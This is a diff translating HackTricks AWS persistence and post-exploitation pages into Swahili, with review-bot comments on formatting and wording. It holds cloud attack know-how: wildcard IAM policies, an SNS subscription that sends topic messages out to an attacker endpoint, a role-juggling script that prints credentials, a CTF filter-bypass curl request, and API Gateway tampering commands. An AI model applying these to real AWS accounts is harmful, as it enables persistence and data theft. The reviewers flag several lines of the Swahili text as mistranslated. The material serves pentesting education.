-The following policy gives everyone in AWS access to read and write in the SNS topic called **`MySNS.fifo`**:
-
+Unapounda **SNS topic** unahitaji kuonyesha kwa sera ya IAM **nani ana ruhusa ya kusoma na kuandika**. Inawezekana kuonyesha akaunti za nje, ARN za majukumu, au **hata "\*"**.\
+Sera ifuatayo inawapa kila mtu katika AWS ruhusa ya kusoma na kuandika katika SNS topic inayoitwa **`MySNS.fifo`**:
```json
{
- "Version": "2008-10-17",
- "Id": "__default_policy_ID",
- "Statement": [
- {
- "Sid": "__default_statement_ID",
- "Effect": "Allow",
- "Principal": {
- "AWS": "*"
- },
- "Action": [
- "SNS:Publish",
- "SNS:RemovePermission",
- "SNS:SetTopicAttributes",
- "SNS:DeleteTopic",
- "SNS:ListSubscriptionsByTopic",
- "SNS:GetTopicAttributes",
- "SNS:AddPermission",
- "SNS:Subscribe"
- ],
- "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo",
- "Condition": {
- "StringEquals": {
- "AWS:SourceOwner": "318142138553"
- }
- }
- },
- {
- "Sid": "__console_pub_0",
- "Effect": "Allow",
- "Principal": {
- "AWS": "*"
- },
- "Action": "SNS:Publish",
- "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
- },
- {
- "Sid": "__console_sub_0",
- "Effect": "Allow",
- "Principal": {
- "AWS": "*"
- },
- "Action": "SNS:Subscribe",
- "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
- }
- ]
+"Version": "2008-10-17",
+"Id": "__default_policy_ID",
+"Statement": [
+{
+"Sid": "__default_statement_ID",
+"Effect": "Allow",
+"Principal": {
+"AWS": "*"
+},
+"Action": [
+"SNS:Publish",
+"SNS:RemovePermission",
+"SNS:SetTopicAttributes",
+"SNS:DeleteTopic",
+"SNS:ListSubscriptionsByTopic",
+"SNS:GetTopicAttributes",
+"SNS:AddPermission",
+"SNS:Subscribe"
+],
+"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo",
+"Condition": {
+"StringEquals": {
+"AWS:SourceOwner": "318142138553"
+}
+}
+},
+{
+"Sid": "__console_pub_0",
+"Effect": "Allow",
+"Principal": {
+"AWS": "*"
+},
+"Action": "SNS:Publish",
+"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
+},
+{
+"Sid": "__console_sub_0",
+"Effect": "Allow",
+"Principal": {
+"AWS": "*"
+},
+"Action": "SNS:Subscribe",
+"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
+}
+]
}
```
-
### Create Subscribers
-To continue exfiltrating all the messages from all the topics and attacker could **create subscribers for all the topics**.
-
-Note that if the **topic is of type FIFO**, only subscribers using the protocol **SQS** can be used.
+Ili kuendelea kutoa ujumbe wote kutoka kwa mada zote, mshambuliaji anaweza **kuunda wanachama kwa mada zote**.
+Kumbuka kwamba ikiwa **mada ni ya aina ya FIFO**, ni wanachama pekee wanaotumia itifaki **SQS** wanaweza kutumika.
```bash
aws sns subscribe --region \
- --protocol http \
- --notification-endpoint http:/// \
- --topic-arn
+--protocol http \
+--notification-endpoint http:/// \
+--topic-arn
```
-
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
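Review bot: The JSON policy lost all its indentation (`+"Statement": [`, `+{`, `+"Sid": "__default_statement_ID",` are all flush-left); it is still valid JSON, but the three statements and their nested `Principal`/`Condition` objects are now unreadable, which matters for a block whose whole point is showing where `"AWS": "*"` sits relative to the `AWS:SourceOwner` condition. Please keep the original indentation. The blank line between `... kuunda wanachama kwa mada zote**.` and `Kumbuka kwamba ikiwa **mada ni ya aina ya FIFO** ...` was also dropped, merging two paragraphs into one. While here, the context lines `aws sns subscribe --region \`, `--notification-endpoint http:/// \` and `--topic-arn` have empty values (the original placeholders appear to have been swallowed, probably as angle-bracket tags); restoring visible placeholders would stop readers copying an invalid command.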
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md
index 88f396173..5b3cd8808 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md
@@ -4,40 +4,34 @@
## SQS
-For more information check:
+Kwa maelezo zaidi angalia:
{{#ref}}
../aws-services/aws-sqs-and-sns-enum.md
{{#endref}}
-### Using resource policy
-
-In SQS you need to indicate with an IAM policy **who has access to read and write**. It's possible to indicate external accounts, ARN of roles, or **even "\*"**.\
-The following policy gives everyone in AWS access to everything in the queue called **MyTestQueue**:
+### Kutumia sera ya rasilimali
+Katika SQS unahitaji kuonyesha kwa sera ya IAM **nani ana ufikiaji wa kusoma na kuandika**. Inawezekana kuonyesha akaunti za nje, ARN za majukumu, au **hata "\*"**.\
+Sera ifuatayo inawapa kila mtu katika AWS ufikiaji wa kila kitu katika foleni inayoitwa **MyTestQueue**:
```json
{
- "Version": "2008-10-17",
- "Id": "__default_policy_ID",
- "Statement": [
- {
- "Sid": "__owner_statement",
- "Effect": "Allow",
- "Principal": {
- "AWS": "*"
- },
- "Action": ["SQS:*"],
- "Resource": "arn:aws:sqs:us-east-1:123123123123:MyTestQueue"
- }
- ]
+"Version": "2008-10-17",
+"Id": "__default_policy_ID",
+"Statement": [
+{
+"Sid": "__owner_statement",
+"Effect": "Allow",
+"Principal": {
+"AWS": "*"
+},
+"Action": ["SQS:*"],
+"Resource": "arn:aws:sqs:us-east-1:123123123123:MyTestQueue"
+}
+]
}
```
-
> [!NOTE]
-> You could even **trigger a Lambda in the attackers account every-time a new message** is put in the queue (you would need to re-put it) somehow. For this follow these instructinos: [https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html](https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html)
+> Unaweza hata **kuanzisha Lambda katika akaunti ya washambuliaji kila wakati ujumbe mpya** unapoingizwa kwenye foleni (utahitaji kuingiza tena) kwa njia fulani. Kwa hili fuata maelekezo haya: [https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html](https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html)
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
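Review bot: Same indentation loss as in the SNS policy: `+"Principal": {`, `+"AWS": "*"` and `+"Action": ["SQS:*"],` are flush-left, so the nesting of the single `__owner_statement` is no longer visible; preserve the original indentation and change only the prose line. The replacement of the misspelled `instructinos` by `maelekezo haya` is fine.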
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md
index c1b9a422b..3bd0aae28 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md
@@ -1,6 +1 @@
# AWS - SSM Perssitence
-
-
-
-
-
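Review bot: The only surviving line, `# AWS - SSM Perssitence`, still carries the misspelling (it is also in the path `aws-ssm-perssitence.md`); fix at least the visible title while touching this file. After this hunk the page consists of the heading alone, with no banner include and no body, unlike every other persistence page in the patch.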
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md
index 4e8c120ff..2c13b3e37 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md
@@ -4,22 +4,18 @@
## Step Functions
-For more information check:
+Kwa maelezo zaidi angalia:
{{#ref}}
../aws-services/aws-stepfunctions-enum.md
{{#endref}}
-### Step function Backdooring
+### Backdooring ya Step Function
-Backdoor a step function to make it perform any persistence trick so every time it's executed it will run your malicious steps.
+Backdoor step function ili iweze kufanya ujanja wowote wa kudumu hivyo kila wakati inatekelezwa itatekeleza hatua zako za uhalifu.
-### Backdooring aliases
+### Backdooring ya majina
-If the AWS account is using aliases to call step functions it would be possible to modify an alias to use a new backdoored version of the step function.
+Ikiwa akaunti ya AWS inatumia majina kuita step functions, itakuwa inawezekana kubadilisha jina ili kutumia toleo jipya lililo na backdoor la step function.
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
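Review bot: `+### Backdooring ya majina` and `kubadilisha jina` translate the Step Functions concept "alias" as `majina`/`jina` (names), which loses the AWS term; keep `alias` untranslated the way `step function` is kept in the same lines. `hatua zako za uhalifu` ("your criminal steps") for "your malicious steps" reads oddly; `hasidi` is the usual word for malicious.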
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md
index 74db04bec..9ae86b56e 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md
@@ -4,62 +4,59 @@
## STS
-For more information access:
+Kwa maelezo zaidi tembelea:
{{#ref}}
../aws-services/aws-sts-enum.md
{{#endref}}
-### Assume role token
+### Token ya kuzingatia jukumu
-Temporary tokens cannot be listed, so maintaining an active temporary token is a way to maintain persistence.
+Token za muda mfupi haziwezi kuorodheshwa, hivyo kudumisha token ya muda mfupi iliyo hai ni njia ya kudumisha uvumilivu.
aws sts get-session-token --duration-seconds 129600
-# With MFA
+# Pamoja na MFA
aws sts get-session-token \
- --serial-number <mfa-device-name> \
- --token-code <code-from-token>
+--serial-number <mfa-device-name> \
+--token-code <code-from-token>
-# Hardware device name is usually the number from the back of the device, such as GAHT12345678
-# SMS device name is the ARN in AWS, such as arn:aws:iam::123456789012:sms-mfa/username
-# Vritual device name is the ARN in AWS, such as arn:aws:iam::123456789012:mfa/username
+# Jina la kifaa cha vifaa mara nyingi ni nambari kutoka nyuma ya kifaa, kama GAHT12345678
+# Jina la kifaa cha SMS ni ARN katika AWS, kama arn:aws:iam::123456789012:sms-mfa/username
+# Jina la kifaa cha Kijamii ni ARN katika AWS, kama arn:aws:iam::123456789012:mfa/username
-### Role Chain Juggling
+### Kucheza Mnyororo wa Jukumu
-[**Role chaining is an acknowledged AWS feature**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_terms-and-concepts.html#Role%20chaining), often utilized for maintaining stealth persistence. It involves the ability to **assume a role which then assumes another**, potentially reverting to the initial role in a **cyclical manner**. Each time a role is assumed, the credentials' expiration field is refreshed. Consequently, if two roles are configured to mutually assume each other, this setup allows for the perpetual renewal of credentials.
-
-You can use this [**tool**](https://github.com/hotnops/AWSRoleJuggler/) to keep the role chaining going:
+[**Kucheza mnyororo wa jukumu ni kipengele kinachotambulika cha AWS**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_terms-and-concepts.html#Role%20chaining), mara nyingi hutumiwa kudumisha uvumilivu wa siri. Inahusisha uwezo wa **kuchukua jukumu ambalo kisha linachukua jingine**, huenda ikarejea kwenye jukumu la awali kwa **njia ya mzunguko**. Kila wakati jukumu linapochukuliwa, uwanja wa muda wa kuisha wa ithibati unarefresh. Kwa hivyo, ikiwa majukumu mawili yamewekwa ili kuchukua kila mmoja, mpangilio huu unaruhusu upya wa kudumu wa ithibati.
+Unaweza kutumia [**chombo hiki**](https://github.com/hotnops/AWSRoleJuggler/) kudumisha mnyororo wa jukumu:
```bash
./aws_role_juggler.py -h
usage: aws_role_juggler.py [-h] [-r ROLE_LIST [ROLE_LIST ...]]
optional arguments:
- -h, --help show this help message and exit
- -r ROLE_LIST [ROLE_LIST ...], --role-list ROLE_LIST [ROLE_LIST ...]
+-h, --help show this help message and exit
+-r ROLE_LIST [ROLE_LIST ...], --role-list ROLE_LIST [ROLE_LIST ...]
```
-
> [!CAUTION]
-> Note that the [find_circular_trust.py](https://github.com/hotnops/AWSRoleJuggler/blob/master/find_circular_trust.py) script from that Github repository doesn't find all the ways a role chain can be configured.
+> Kumbuka kwamba skripti ya [find_circular_trust.py](https://github.com/hotnops/AWSRoleJuggler/blob/master/find_circular_trust.py) kutoka kwenye hifadhi hiyo ya Github haipati njia zote ambazo mnyororo wa jukumu unaweza kuundwa.
Code to perform Role Juggling from PowerShell
-
```powershell
# PowerShell script to check for role juggling possibilities using AWS CLI
# Check for AWS CLI installation
if (-not (Get-Command "aws" -ErrorAction SilentlyContinue)) {
- Write-Error "AWS CLI is not installed. Please install it and configure it with 'aws configure'."
- exit
+Write-Error "AWS CLI is not installed. Please install it and configure it with 'aws configure'."
+exit
}
# Function to list IAM roles
function List-IAMRoles {
- aws iam list-roles --query "Roles[*].{RoleName:RoleName, Arn:Arn}" --output json
+aws iam list-roles --query "Roles[*].{RoleName:RoleName, Arn:Arn}" --output json
}
# Initialize error count
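Review bot: `+### Token ya kuzingatia jukumu` renders the STS action "assume role" as `kuzingatia` (to consider); since the commands below are `aws sts get-session-token` and `assume-role`, keep the API term. Likewise `uvumilivu` means patience/tolerance rather than persistence (the Lightsail and Step Functions files in this patch use `kudumu`), `Kucheza mnyororo wa jukumu` ("playing the role chain") should keep the AWS term "Role chaining" used by the linked documentation, `+# Jina la kifaa cha Kijamii` says "social device" where the removed line says "Virtual device", and `unarefresh` is an English verb with a Swahili prefix (`unasasishwa`). Two structural points: the command lines from `aws sts get-session-token --duration-seconds 129600` through the three device-name comments sit outside any code fence in both versions, so `<mfa-device-name>` and `<code-from-token>` are liable to be swallowed as HTML tags by the renderer; and the blank line between the role-chaining paragraph and `Unaweza kutumia [**chombo hiki**] ...` was dropped, merging the two paragraphs.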
@@ -70,66 +67,61 @@ $roles = List-IAMRoles | ConvertFrom-Json
# Attempt to assume each role
foreach ($role in $roles) {
- $sessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime)
- try {
- $credentials = aws sts assume-role --role-arn $role.Arn --role-session-name $sessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json
- if ($credentials) {
- Write-Host "Successfully assumed role: $($role.RoleName)"
- Write-Host "Access Key: $($credentials.AccessKeyId)"
- Write-Host "Secret Access Key: $($credentials.SecretAccessKey)"
- Write-Host "Session Token: $($credentials.SessionToken)"
- Write-Host "Expiration: $($credentials.Expiration)"
+$sessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime)
+try {
+$credentials = aws sts assume-role --role-arn $role.Arn --role-session-name $sessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json
+if ($credentials) {
+Write-Host "Successfully assumed role: $($role.RoleName)"
+Write-Host "Access Key: $($credentials.AccessKeyId)"
+Write-Host "Secret Access Key: $($credentials.SecretAccessKey)"
+Write-Host "Session Token: $($credentials.SessionToken)"
+Write-Host "Expiration: $($credentials.Expiration)"
- # Set temporary credentials to assume the next role
- $env:AWS_ACCESS_KEY_ID = $credentials.AccessKeyId
- $env:AWS_SECRET_ACCESS_KEY = $credentials.SecretAccessKey
- $env:AWS_SESSION_TOKEN = $credentials.SessionToken
+# Set temporary credentials to assume the next role
+$env:AWS_ACCESS_KEY_ID = $credentials.AccessKeyId
+$env:AWS_SECRET_ACCESS_KEY = $credentials.SecretAccessKey
+$env:AWS_SESSION_TOKEN = $credentials.SessionToken
- # Try to assume another role using the temporary credentials
- foreach ($nextRole in $roles) {
- if ($nextRole.Arn -ne $role.Arn) {
- $nextSessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime)
- try {
- $nextCredentials = aws sts assume-role --role-arn $nextRole.Arn --role-session-name $nextSessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json
- if ($nextCredentials) {
- Write-Host "Also successfully assumed role: $($nextRole.RoleName) from $($role.RoleName)"
- Write-Host "Access Key: $($nextCredentials.AccessKeyId)"
- Write-Host "Secret Access Key: $($nextCredentials.SecretAccessKey)"
- Write-Host "Session Token: $($nextCredentials.SessionToken)"
- Write-Host "Expiration: $($nextCredentials.Expiration)"
- }
- } catch {
- $errorCount++
- }
- }
- }
+# Try to assume another role using the temporary credentials
+foreach ($nextRole in $roles) {
+if ($nextRole.Arn -ne $role.Arn) {
+$nextSessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime)
+try {
+$nextCredentials = aws sts assume-role --role-arn $nextRole.Arn --role-session-name $nextSessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json
+if ($nextCredentials) {
+Write-Host "Also successfully assumed role: $($nextRole.RoleName) from $($role.RoleName)"
+Write-Host "Access Key: $($nextCredentials.AccessKeyId)"
+Write-Host "Secret Access Key: $($nextCredentials.SecretAccessKey)"
+Write-Host "Session Token: $($nextCredentials.SessionToken)"
+Write-Host "Expiration: $($nextCredentials.Expiration)"
+}
+} catch {
+$errorCount++
+}
+}
+}
- # Reset environment variables
- Remove-Item Env:\AWS_ACCESS_KEY_ID
- Remove-Item Env:\AWS_SECRET_ACCESS_KEY
- Remove-Item Env:\AWS_SESSION_TOKEN
- } else {
- $errorCount++
- }
- } catch {
- $errorCount++
- }
+# Reset environment variables
+Remove-Item Env:\AWS_ACCESS_KEY_ID
+Remove-Item Env:\AWS_SECRET_ACCESS_KEY
+Remove-Item Env:\AWS_SESSION_TOKEN
+} else {
+$errorCount++
+}
+} catch {
+$errorCount++
+}
}
# Output the number of errors if any
if ($errorCount -gt 0) {
- Write-Host "$errorCount error(s) occurred during role assumption attempts."
+Write-Host "$errorCount error(s) occurred during role assumption attempts."
} else {
- Write-Host "No errors occurred. All roles checked successfully."
+Write-Host "No errors occurred. All roles checked successfully."
}
Write-Host "Role juggling check complete."
```
-
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
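Review bot: The PowerShell script body was flattened to column 0 (everything from `+$sessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime)` down to the closing braces of the nested `foreach`/`try`/`catch`). PowerShell still parses it, but with several nesting levels collapsed the `} catch {` and `} else {` pairs can no longer be matched by eye; keep the indentation, since this hunk changes no code at all. The context line `Code to perform Role Juggling from PowerShell` was also left in English while the surrounding prose is translated.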
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md
index 53f79d916..a63b28b33 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md
@@ -1,6 +1 @@
-# AWS - Post Exploitation
-
-
-
-
-
+# AWS - Baada ya Kutumia
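Review bot: `+# AWS - Baada ya Kutumia` reads as "AWS - After Using"; "Post Exploitation" is the name of this section in the directory (`aws-post-exploitation/`) and in the sub-page titles, so either keep it as a term or use a word for exploitation rather than `kutumia` (to use). Removing the trailing blank lines is fine.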
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md
index 4847c40e0..c9a1e15a3 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md
@@ -4,48 +4,43 @@
## API Gateway
-For more information check:
+Kwa maelezo zaidi angalia:
{{#ref}}
../aws-services/aws-api-gateway-enum.md
{{#endref}}
-### Access unexposed APIs
+### Upataji wa APIs zisizo wazi
-You can create an endpoint in [https://us-east-1.console.aws.amazon.com/vpc/home#CreateVpcEndpoint](https://us-east-1.console.aws.amazon.com/vpc/home?region=us-east-1#CreateVpcEndpoint:) with the service `com.amazonaws.us-east-1.execute-api`, expose the endpoint in a network where you have access (potentially via an EC2 machine) and assign a security group allowing all connections.\
-Then, from the EC2 machine you will be able to access the endpoint and therefore call the gateway API that wasn't exposed before.
+Unaweza kuunda kiunganishi katika [https://us-east-1.console.aws.amazon.com/vpc/home#CreateVpcEndpoint](https://us-east-1.console.aws.amazon.com/vpc/home?region=us-east-1#CreateVpcEndpoint:) na huduma `com.amazonaws.us-east-1.execute-api`, funua kiunganishi katika mtandao ambapo una ufikiaji (labda kupitia mashine ya EC2) na piga kundi la usalama linaloruhusu mawasiliano yote.\
+Kisha, kutoka kwa mashine ya EC2 utaweza kufikia kiunganishi na hivyo kuita API ya gateway ambayo haikuwa wazi hapo awali.
-### Bypass Request body passthrough
+### Kupita kupitia mwili wa Ombi
-This technique was found in [**this CTF writeup**](https://blog-tyage-net.translate.goog/post/2023/2023-09-03-midnightsun/?_x_tr_sl=en&_x_tr_tl=es&_x_tr_hl=en&_x_tr_pto=wapp).
+Teknolojia hii ilipatikana katika [**hii CTF writeup**](https://blog-tyage-net.translate.goog/post/2023/2023-09-03-midnightsun/?_x_tr_sl=en&_x_tr_tl=es&_x_tr_hl=en&_x_tr_pto=wapp).
-As indicated in the [**AWS documentation**](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-method-integration.html) in the `PassthroughBehavior` section, by default, the value **`WHEN_NO_MATCH`** , when checking the **Content-Type** header of the request, will pass the request to the back end with no transformation.
-
-Therefore, in the CTF the API Gateway had an integration template that was **preventing the flag from being exfiltrated** in a response when a request was sent with `Content-Type: application/json`:
+Kama ilivyoonyeshwa katika [**nyaraka za AWS**](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-method-integration.html) katika sehemu ya `PassthroughBehavior`, kwa default, thamani **`WHEN_NO_MATCH`**, wakati wa kuangalia kichwa cha **Content-Type** cha ombi, itapitisha ombi kwa nyuma bila mabadiliko.
+Hivyo, katika CTF, API Gateway ilikuwa na kiolezo cha uunganisho ambacho kilikuwa **kikizuia bendera kutolewa** katika jibu wakati ombi lilitumwa na `Content-Type: application/json`:
```yaml
RequestTemplates:
- application/json: '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename=:moviename","FilterExpression": "not contains(#description, :flagstring)","ExpressionAttributeNames": {"#description": "description"},"ExpressionAttributeValues":{":moviename":{"S":"$util.escapeJavaScript($input.params(''moviename''))"},":flagstring":{"S":"midnight"}}}'
+application/json: '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename=:moviename","FilterExpression": "not contains(#description, :flagstring)","ExpressionAttributeNames": {"#description": "description"},"ExpressionAttributeValues":{":moviename":{"S":"$util.escapeJavaScript($input.params(''moviename''))"},":flagstring":{"S":"midnight"}}}'
```
+Hata hivyo, kutuma ombi lenye **`Content-type: text/json`** kungesitisha chujio hicho.
-However, sending a request with **`Content-type: text/json`** would prevent that filter.
-
-Finally, as the API Gateway was only allowing `Get` and `Options`, it was possible to send an arbitrary dynamoDB query without any limit sending a POST request with the query in the body and using the header `X-HTTP-Method-Override: GET`:
-
+Hatimaye, kwa kuwa API Gateway ilikuwa ikiruhusu tu `Get` na `Options`, ilikuwa inawezekana kutuma uchunguzi wa dynamoDB bila kikomo kwa kutuma ombi la POST lenye uchunguzi katika mwili na kutumia kichwa `X-HTTP-Method-Override: GET`:
```bash
curl https://vu5bqggmfc.execute-api.eu-north-1.amazonaws.com/prod/movies/hackers -H 'X-HTTP-Method-Override: GET' -H 'Content-Type: text/json' --data '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename = :moviename","ExpressionAttributeValues":{":moviename":{"S":"hackers"}}}'
```
-
### Usage Plans DoS
-In the **Enumeration** section you can see how to **obtain the usage plan** of the keys. If you have the key and it's **limited** to X usages **per month**, you could **just use it and cause a DoS**.
+Katika sehemu ya **Enumeration** unaweza kuona jinsi ya **kupata mpango wa matumizi** wa funguo. Ikiwa una funguo na ime **punguzia** matumizi X **kwa mwezi**, unaweza **kuitumia tu na kusababisha DoS**.
-The **API Key** just need to be **included** inside a **HTTP header** called **`x-api-key`**.
+**API Key** inahitaji tu **kujumuishwa** ndani ya **HTTP header** inayoitwa **`x-api-key`**.
### `apigateway:UpdateGatewayResponse`, `apigateway:CreateDeployment`
-An attacker with the permissions `apigateway:UpdateGatewayResponse` and `apigateway:CreateDeployment` can **modify an existing Gateway Response to include custom headers or response templates that leak sensitive information or execute malicious scripts**.
-
+Mshambuliaji mwenye ruhusa `apigateway:UpdateGatewayResponse` na `apigateway:CreateDeployment` anaweza **kubadilisha Jibu la Gateway lililopo ili kujumuisha vichwa vya habari vya kawaida au templeti za majibu ambazo zinavuja taarifa nyeti au kutekeleza scripts za uhalifu**.
```bash
API_ID="your-api-id"
RESPONSE_TYPE="DEFAULT_4XX"
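Review bot: the YAML snippet loses its nesting at the `application/json:` line: in the removed line it was indented under `RequestTemplates:`, and the translated line starts at column 0, so the block now parses as two top-level keys (`RequestTemplates:` with a null value, then `application/json:`) instead of a request template mapped under `RequestTemplates`. Restore the leading spaces. Separately, the blank lines before the yaml and bash fences were dropped; keep them for consistency with the rest of the book. On wording: `Teknolojia hii` means "this technology" where "technique" is meant (`Mbinu hii`), `piga kundi la usalama` reads as "hit a security group" rather than assign one (`weka` or `ambatisha kundi la usalama`), and the heading `Kupita kupitia mwili wa Ombi` drops the "bypass" sense of the original "Bypass Request body passthrough", which is the point of the section.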
@@ -56,16 +51,14 @@ aws apigateway update-gateway-response --rest-api-id $API_ID --response-type $RE
# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
```
-
-**Potential Impact**: Leakage of sensitive information, executing malicious scripts, or unauthorized access to API resources.
+**Madhara Yanayoweza Kutokea**: Kuvuja kwa taarifa nyeti, kutekeleza skripti zenye uharibifu, au ufikiaji usioidhinishwa wa rasilimali za API.
> [!NOTE]
-> Need testing
+> Inahitaji kupimwa
### `apigateway:UpdateStage`, `apigateway:CreateDeployment`
-An attacker with the permissions `apigateway:UpdateStage` and `apigateway:CreateDeployment` can **modify an existing API Gateway stage to redirect traffic to a different stage or change the caching settings to gain unauthorized access to cached data**.
-
+Mshambuliaji mwenye ruhusa `apigateway:UpdateStage` na `apigateway:CreateDeployment` anaweza **kubadilisha hatua ya API Gateway iliyopo ili kuelekeza trafiki kwenye hatua tofauti au kubadilisha mipangilio ya caching ili kupata ufikiaji usioidhinishwa wa data iliyohifadhiwa**.
```bash
API_ID="your-api-id"
STAGE_NAME="Prod"
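Review bot: the blank line between the closing bash fence and `**Madhara Yanayoweza Kutokea**` is removed here, and the same happens in the corresponding lines of the following hunks of this file; the original kept one, and dropping it makes the impact paragraph run straight into the code block in the source. Keep the separating blank line. The translation of the impact sentence and of `> Inahitaji kupimwa` is fine.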
@@ -76,16 +69,14 @@ aws apigateway update-stage --rest-api-id $API_ID --stage-name $STAGE_NAME --pat
# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
```
-
-**Potential Impact**: Unauthorized access to cached data, disrupting or intercepting API traffic.
+**Madhara Yanayoweza Kutokea**: Ufikiaji usioidhinishwa wa data iliyohifadhiwa, kuingilia au kuzuia trafiki ya API.
> [!NOTE]
-> Need testing
+> Inahitaji kupimwa
### `apigateway:PutMethodResponse`, `apigateway:CreateDeployment`
-An attacker with the permissions `apigateway:PutMethodResponse` and `apigateway:CreateDeployment` can **modify the method response of an existing API Gateway REST API method to include custom headers or response templates that leak sensitive information or execute malicious scripts**.
-
+Mshambuliaji mwenye ruhusa `apigateway:PutMethodResponse` na `apigateway:CreateDeployment` anaweza **kubadilisha jibu la njia ya API Gateway REST API iliyopo ili kujumuisha vichwa vya habari vya kawaida au templeti za majibu ambazo zinavuja taarifa nyeti au kutekeleza scripts zenye uharibifu**.
```bash
API_ID="your-api-id"
RESOURCE_ID="your-resource-id"
@@ -98,16 +89,14 @@ aws apigateway put-method-response --rest-api-id $API_ID --resource-id $RESOURCE
# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
```
-
-**Potential Impact**: Leakage of sensitive information, executing malicious scripts, or unauthorized access to API resources.
+**Madhara Yanayoweza Kutokea**: Kuvuja kwa taarifa nyeti, kutekeleza skripti zenye uharibifu, au ufikiaji usioidhinishwa wa rasilimali za API.
> [!NOTE]
-> Need testing
+> Inahitaji kupimwa
### `apigateway:UpdateRestApi`, `apigateway:CreateDeployment`
-An attacker with the permissions `apigateway:UpdateRestApi` and `apigateway:CreateDeployment` can **modify the API Gateway REST API settings to disable logging or change the minimum TLS version, potentially weakening the security of the API**.
-
+Mshambuliaji mwenye ruhusa `apigateway:UpdateRestApi` na `apigateway:CreateDeployment` anaweza **kubadilisha mipangilio ya API Gateway REST API ili kuzima uandishi wa kumbukumbu au kubadilisha toleo la chini la TLS, ambayo inaweza kudhoofisha usalama wa API**.
```bash
API_ID="your-api-id"
@@ -117,16 +106,14 @@ aws apigateway update-rest-api --rest-api-id $API_ID --patch-operations op=repla
# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
```
-
-**Potential Impact**: Weakening the security of the API, potentially allowing unauthorized access or exposing sensitive information.
+**Madhara Yanayoweza Kutokea**: Kupunguza usalama wa API, ambayo inaweza kuruhusu ufikiaji usioidhinishwa au kufichua taarifa nyeti.
> [!NOTE]
-> Need testing
+> Inahitaji kupimwa
### `apigateway:CreateApiKey`, `apigateway:UpdateApiKey`, `apigateway:CreateUsagePlan`, `apigateway:CreateUsagePlanKey`
-An attacker with permissions `apigateway:CreateApiKey`, `apigateway:UpdateApiKey`, `apigateway:CreateUsagePlan`, and `apigateway:CreateUsagePlanKey` can **create new API keys, associate them with usage plans, and then use these keys for unauthorized access to APIs**.
-
+Mshambuliaji mwenye ruhusa `apigateway:CreateApiKey`, `apigateway:UpdateApiKey`, `apigateway:CreateUsagePlan`, na `apigateway:CreateUsagePlanKey` anaweza **kuunda funguo mpya za API, kuziunganisha na mipango ya matumizi, na kisha kutumia funguo hizi kwa ufikiaji usioidhinishwa kwa APIs**.
```bash
# Create a new API key
API_KEY=$(aws apigateway create-api-key --enabled --output text --query 'id')
